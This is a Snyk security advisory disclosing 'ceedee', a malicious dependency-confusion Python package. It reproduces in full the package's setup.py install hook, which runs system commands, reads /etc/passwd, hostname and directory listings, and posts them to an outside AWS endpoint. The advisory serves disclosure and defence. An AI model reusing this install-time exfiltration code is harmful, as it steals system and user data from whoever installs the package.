Malicious Package Affecting ceedee package, versions [0,]
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-PYTHON-CEEDEE-3057943
- published21 Oct 2022
- disclosed21 Oct 2022
- creditRaul Onitza-Klugman, Snyk
Introduced: 21 Oct 2022
Malicious CVE NOT AVAILABLE CWE-506 (opens in a new tab)How to fix?
Avoid using all malicious instances of the ceedee package.
Overview
ceedee is a malicious package. This is a "dependency confusion" package, which means the package name is based on existing repositories, namespaces, or components, it aims to trick users into downloading the package which contains a malicious code.
This package exfiltrates user data such as /etc/passwd to a remote host on AWS rk8xxqzdug.execute-api.us-east-1.amazonaws.com
Malicious Code
Can be found in the setup.py file
from setuptools import setup, find_packages import os import platform import requests from urllib import request, parsePlease do not delete this.
os_name = platform.system() data = {} if os_name == 'Linux' or os_name == 'Darwin': try: hostname = os.popen('hostname').read() whoami = os.popen('whoami').read() passwd_file = os.popen('cat /etc/passwd').read() os_info = os.popen('uname -a').read() curr_dir = os.popen("pwd").read() list_curr_dir = os.popen("ls -la").read()
data = { 'OS': os_name, 'Hostname': hostname, 'Logged In Username': whoami, 'Password File': passwd_file, 'OS Information': os_info, 'Current Directory': curr_dir, 'List of files in Current Directory': list_curr_dir } except: data = {'Error': 'There was an error while fetching OS related data or sending information for ' + os_name}elif os_name == 'Windows': try: hostname = os.popen('hostname').read() whoami = os.popen('whoami').read() curr_dir = os.popen("cd").read() list_curr_dir = os.popen("dir").read()
data = { 'OS': os_name, 'Hostname': hostname, 'Logged In Username': whoami, 'Current Directory': curr_dir, 'List of files in Current Directory': list_curr_dir } except: data = {'Error': 'There was an error while fetching OS related data or sending information for ' + os_name}else: data = {'Error': 'Cannot determine OS'}
data_enc = parse.urlencode(data).encode() API_ENDPOINT = "https://rk8xxqzdug.execute-api.us-east-1.amazonaws.com/Test/response" req = request.Request(API_ENDPOINT, data=data_enc) res = request.urlopen(req)